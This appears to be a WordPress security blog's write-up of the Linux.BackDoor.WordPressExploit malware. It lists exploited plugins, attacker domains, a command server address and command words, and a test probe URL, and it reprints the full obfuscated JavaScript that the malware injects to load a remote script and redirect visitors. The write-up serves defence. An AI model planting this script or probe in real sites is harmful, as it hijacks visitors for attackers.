A new malware called Linux.BackDoor.WordPressExploit.1 has been discovered targeting WordPress sites, exploiting 30 vulnerabilities in outdated WordPress plugins and themes.
The malware injects malicious JavaScript into the targeted websites, allowing the infected sites to redirect visitors to other malicious sites and disabling event logging, going into sleep mode and shutting down. It specifically targets 32-bit versions of Linux, but can also affect 64-bit versions.
Security firm Dr.Web estimates that over 1,300 sites currently contain the JavaScript that powers this backdoor, though some of these sites may have removed the malware since being detected.
It is important for website owners to ensure that their plugins and themes are kept up to date in order to protect against these types of attacks. You can also use Secure WordPress Themes for your WordPress site.
Plugins exploited include:
- WP GDPR Compliance Plugin
- Newspaper Theme on WordPress Access Control (vulnerability CVE-2016-10972)
- Thim Core
- Google Code Inserter
- Total Donations Plugin
- Post Custom Templates Lite
- WP Quick Booking Manager
- Facebook Live Chat by Zotabox
- Blog Designer WordPress Plugin
- WP Live Chat Support Plugin
- WordPress – Yuzo Related Posts
- Yellow Pencil Visual Theme Customizer Plugin
- Easysmtp
- WordPress Ultimate FAQ (vulnerabilities CVE-2019-17232 and CVE-2019-17233)
- WP-Matomo Integration (WP-Piwik)
- WordPress ND Shortcodes For Visual Composer
- WP Live Chat
- WordPress Coming Soon Page
- WordPress theme OneTone
- Simple Fields WordPress Plugin
- WordPress Delucks SEO plugin
- Poll, Survey, Form & Quiz Maker by OpinionStage
- Social Metrics Tracker
- WPeMatico RSS Feed Fetcher
- Rich Reviews plugin
- Coming Soon Page and Maintenance Mode
- Hybrid
- Brizy WordPress Plugin
- FV Flowplayer Video Player
- WooCommerce
If a vulnerability is exploited, the targeted page will be injected with malicious JavaScript downloaded from a remote server.
This JavaScript will be launched first whenever the infected page is loaded, regardless of the page’s original content.
As a result, every time the user clicks on the infected page, they will be redirected to a website chosen by the attackers.
The malicious JavaScript injected into the targeted page contains links to various malicious domains, including:
- lobbydesires[.]com
- letsmakeparty3[.]ga
- deliverygoodstrategies[.]com
- gabriellalovecats[.]com
- css[.]digestcolect[.]com
- clon[.]collectfasttracks[.]com
- Count[.]trackstatisticsss[.]com
The screenshot below illustrates how the malicious JavaScript appears in the page source code of an infected site. It is important for website owners to check their site’s source code regularly and to be alert for any unfamiliar or suspicious code:
Researchers have discovered two versions of Linux.BackDoor malware: Linux.BackDoor.WordPressExploit.1 and Linux.BackDoor.WordPressExploit.2. It is believed that the malware has been in use for at least three years.
WordPress plugins have often been used to infect sites, as they can contain vulnerabilities that can lead to infection.
Criminals may use infected sites to redirect visitors to phishing sites, sites involved in ad fraud, or sites that distribute malware.
To protect their WordPress sites, users should ensure that they are using the most current versions of the main software and any plugins, and prioritize updating any plugins that are listed as vulnerable.
Table of Contents [TOC]
What is Linux backdoor malware?
Linux.BackDoor.WordPressExploit.1 is a malware that targets 32-bit versions of Linux, but can also affect 64-bit versions.
It is a remotely controlled backdoor that allows malicious actors to perform various actions, including:
- Attack a specified webpage (website);
- Switch to standby mode;
- Shut itself down;
- Pause logging its actions.
Linux.BackDoor.WordPressExploit.1 is a trojan that targets WordPress-based websites by exploiting known vulnerabilities in outdated WordPress plugins and themes. It injects a malicious script into the targeted websites, allowing the infected sites to be remotely controlled by malicious actors.
Before carrying out an attack, the trojan contacts its command and control server to receive the address of the site it is meant to infect.
It then attempts to exploit vulnerabilities in the aforementioned outdated plugins and themes that may be installed on the targeted website.
Linux.BackDoor.WordPressExploit.1
Added to the Dr.Web virus database: 2022-11-08
Virus description added: 2022-12-30
Packer: absent
SHA1: 215a4470063080696630fb6015378938e8c16a15
Linux.Backdoor.WordPressExploit.1 is controlled through the commands that it receives from a C&C server located at 109[.]234.38[.]69. The available commands are as follows:
{a_webpage_address} — execute an attack on a specified webpage (website);
wait — switch the trojan to standby mode;
letmestop — shut down the trojan;
dieforme77 — pause the trojan’s logging actions.
Before the attack, the backdoor tries attacking the site[.]com in test mode by sending an HTTP request as follows:
hxxp[:]//site[.]com/?action=um_fileupload&domain=test&name=test
If it receives a response that lacks an s-1-s-2-s-3 value at the beginning of the string, Linux.Backdoor.WordPressExploit.1 proceeds on to the main task. Otherwise, it shuts itself down.
Before carrying out an attack, Linux.Backdoor.WordPressExploit.1 receives the address of the targeted website from a command and control server.
It then attempts to exploit 19 known vulnerabilities in various WordPress plugins and themes, starting 250 separate processes.
If it is successful in exploiting a vulnerability that has not been patched, the trojan will inform the command and control server.
Below is a list of the exploiting functions it uses:
The main goal of exploitation is to inject the following script into a vulnerable website:
</style> <script async=true type=text/javascript language=javascript> var nt = String.fromCharCode(98,101,114,116,54); // bert6 var mb = String.fromCharCode(97, 106, 97, 120, 67, 111, 117, 110, 116, 101, 114); // ajaxCounter var sb = String.fromCharCode(115, 99, 114, 105, 112, 116); // script var jb = String.fromCharCode(104, 116, 116, 112, 115, 58, 47, 47); // {https://} var tb = String.fromCharCode(116, 101, 120, 116, 47, 106, 97, 118, 97, 115, 99, 114, 105, 112, 116); // text/javascript var lb = String.fromCharCode(103,97,98,114,105,101,108,108,97,108,111,118,101,99,97,116,115,46,99,111,109,47,108,111,110,101,46,106,115,63,122,111,110,101,105,100,61,56,57,54,53,52,51,50,38,117,116,109,95,99,61,52,38,109,114,111,61); // gabriellalovecats[.]com/lone.js?zoneid=8965432&utm_c=4&mro= var c=document.createElement(sb); c.type=tb,c.async=1,c.src=jb+lb+nt; var n=document.getElementsByTagName(sb)[0]; n.parentNode.insertBefore(c,n); </script>
The purpose of the lone.js script is to inject itself into the attacked webpage. When the infected page is loaded, the lone.js script takes priority over all other elements on the page and is loaded first. The script is received from the hxxps[:]//gabriellalovecats[.]com domain.
It is important for website owners to be vigilant for any unfamiliar or suspicious code in their site’s source code in order to protect against these types of attacks.
To receive a lone.js script, a request to the specified website is made with the following parameters:
hxxps[:]//gabriellalovecats[.]com/lone[.]js?zoneid=8965432&utm_c=4&mro=bert6
Once a webpage is infected, every time a user clicks anywhere on the page, they will be redirected to a website chosen by the attackers. The following are examples of the requests that may be executed upon such redirects.:
GET hxxps[:]//tommyforgreendream[.]icu/LLG94QPz POST hxxps[:]//transadforward[.]icu/v1yZLy GET hxxps[:]//tommyforgreendream[.]icu/LLG94QPz
While it is active, Linux.Backdoor.WordPressExploit.1 keeps track of its actions and reports statistics to its command and control server. These statistics include:
- the total number of websites attacked
- every instance of a vulnerability being exploited successfully
- the number of times it has successfully exploited the WordPress Ultimate FAQ plugin and the Facebook messenger from Zotabox
In addition, it reports any detected and unpatched vulnerabilities to its command and control server.
The trojan also has an unimplemented feature that allows it to hack administrator accounts on targeted websites by using a brute-force attack method to check known logins and passwords with the help of special vocabulary.
This feature may have been present in earlier versions of the trojan or may be planned for inclusion in future versions.
Linux.Backdoor.WordPressExploit.2
Linux.Backdoor.WordPressExploit.2 is a trojan that targets devices with x86-compatible Linux operating systems, including 32-bit and 64-bit versions.
This backdoor is a variant of Linux.Backdoor.WordPressExploit.1, with differences including the address of the command and control server, the domain from which the malicious script is downloaded, and an additional list of vulnerabilities to exploit.
It is important for website owners to keep their plugins and themes up to date in order to protect against these types of attacks.
Protect Your Website with WP Hacked Help: Scan for Backdoors and Other Vulnerabilities
if you are using any plugins that have been found to have Linux.Backdoor.WordPressExploit.2 vulnerability, we recommend running regular scans with WP Hacked Help.
This scanner can detect any potential backdoors vulnerabilities on your site and provide you with the necessary assistance to fix them promptly.
This is especially important as Linux.Backdoor.WordPressExploit.2 vulnerability can compromise the security of your website and potentially lead to data breaches or other security incidents.
By regularly scanning your wordpress site with WP Hacked Help, you can identify and address any vulnerabilities before they can be exploited by malicious actors.